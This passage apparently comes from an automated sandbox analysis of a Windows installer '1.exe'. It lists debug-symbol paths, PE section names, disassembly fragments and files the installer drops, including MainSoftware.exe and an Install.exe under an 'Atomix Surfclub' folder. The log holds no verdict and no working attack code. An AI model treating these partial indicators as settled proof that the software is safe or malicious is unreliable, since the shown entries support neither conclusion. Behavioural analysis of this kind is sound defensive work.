    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000010.00000002.2141619079.0000027536038000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141673495.0000027536061000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbp source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000004.00000002.2258821783.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 00000004.00000000.1278293993.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000002.2228034287.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000000.1506124351.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000010.00000002.2143619192.00000275384D7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141601509.0000027536021000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141547348.0000027536009000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C542000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2143996373.0000027538601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538476000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000010.00000002.2167406026.00007FF7D9618000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538147000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2143876894.00000275385C3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143920191.00000275385D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000010.00000002.2141698149.0000027536080000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141733839.00000275360A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141529603.0000027535FF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbG source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2140154271.00000234A0702000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000010.00000002.2143603521.00000275384C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143558064.00000275384B4000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261349602.000002BDD0C71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000010.00000002.2139801818.000002349ED73000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139872986.000002349ED81000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: shiA18.tmp.4.dr Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_009C0430 LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary, 11_2_009C0430
    Source: 1.exe Static PE information: section name: .didat
    Source: 1.exe Static PE information: section name: .fptable
    Source: ShortcutFlags.dll.4.dr Static PE information: section name: .fptable
    Source: MainSoftware.exe.4.dr Static PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.4.dr Static PE information: section name: .didat
    Source: MainSoftware.exe.4.dr Static PE information: section name: Section
    Source: MainSoftware.exe.4.dr Static PE information: section name: _RDATA
    Source: SoftwareDistributor.exe.4.dr Static PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.4.dr Static PE information: section name: .didat
    Source: SoftwareDistributor.exe.4.dr Static PE information: section name: Section
    Source: SoftwareDistributor.exe.4.dr Static PE information: section name: _RDATA
    Source: MSICFE.tmp.4.dr Static PE information: section name: .fptable
    Source: MSID4D.tmp.4.dr Static PE information: section name: .fptable
    Source: shiA18.tmp.4.dr Static PE information: section name: .wpp_sf
    Source: shiA18.tmp.4.dr Static PE information: section name: .didat
    Source: MSIAC4.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIB81.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIBE0.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIC2F.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIC5F.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIC9E.tmp.4.dr Static PE information: section name: .fptable
    Source: MSICCE.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIEA6.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIEE5.tmp.4.dr Static PE information: section name: .fptable
    Source: MSIF15.tmp.4.dr Static PE information: section name: .fptable
    Source: SoftwareDistributor.exe.7.dr Static PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.7.dr Static PE information: section name: .didat
    Source: SoftwareDistributor.exe.7.dr Static PE information: section name: Section
    Source: SoftwareDistributor.exe.7.dr Static PE information: section name: _RDATA
    Source: MainSoftware.exe.7.dr Static PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.7.dr Static PE information: section name: .didat
    Source: MainSoftware.exe.7.dr Static PE information: section name: Section
    Source: MainSoftware.exe.7.dr Static PE information: section name: _RDATA
    Source: MSI5903.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI5971.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI59B1.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI5A00.tmp.7.dr Static PE information: section name: .didat
    Source: MSI5A00.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI7AA9.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI7B27.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI7B86.tmp.7.dr Static PE information: section name: .fptable
    Source: MSI8914.tmp.7.dr Static PE information: section name: .fptable
    Source: shi56C1.tmp.11.dr Static PE information: section name: .wpp_sf
    Source: shi56C1.tmp.11.dr Static PE information: section name: .didat
    Source: Install.exe.part.13.dr Static PE information: section name: .CLR_UEF
    Source: Install.exe.part.13.dr Static PE information: section name: .didat
    Source: Install.exe.part.13.dr Static PE information: section name: Section
    Source: Install.exe.part.13.dr Static PE information: section name: _RDATA
    Source: Install.exe.21.dr Static PE information: section name: .managed
    Source: Install.exe.21.dr Static PE information: section name: hydrated
    Source: 219880.ocx.30.dr Static PE information: section name: .fptable
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_05403F45 push es; ret 4_3_05403F48
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_05403F49 push es; iretd 4_3_05403F64
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_05403FF5 push es; ret 4_3_05403FF8
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_0537C8F5 push es; iretd 4_3_0537C8F6
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_053782F8 push ebp; ret 4_3_053782F9
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_0537C350 pushad ; retf 4_3_0537C351
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_05391E7E pushfd ; ret 4_3_05391E7F
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_05393EA0 push ecx; ret 4_3_05393EA1
    Source: C:\Users\user\Desktop\1.exe Code function: 4_3_05378EE0 push FFFFFFAAh; iretd 4_3_05379952
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_0086E360 push ecx; mov dword ptr [esp], ecx 11_2_0086E361
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_00A854E7 push ecx; ret 11_2_00A854FA
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_0089157A push 8BFFFFFEh; iretd 11_2_0089158C
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_00991750 push ecx; mov dword ptr [esp], 3F800000h 11_2_009918AC
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Code function: 16_2_00007FF7797FC37C push eax; ret 16_2_00007FF7797FC37D
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Code function: 16_2_00007FF7797F180D push ecx; ret 16_2_00007FF7797F181C
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\lzmaextractor.dll
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\shi56C1.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5903.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7AA9.tmp
    Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe (copy)
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI59B1.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B27.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIB81.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8914.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\ShortcutFlags.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe File created: C:\Program Files (x86)\Main\Chop\Install.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSICFE.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSIC5F.tmp
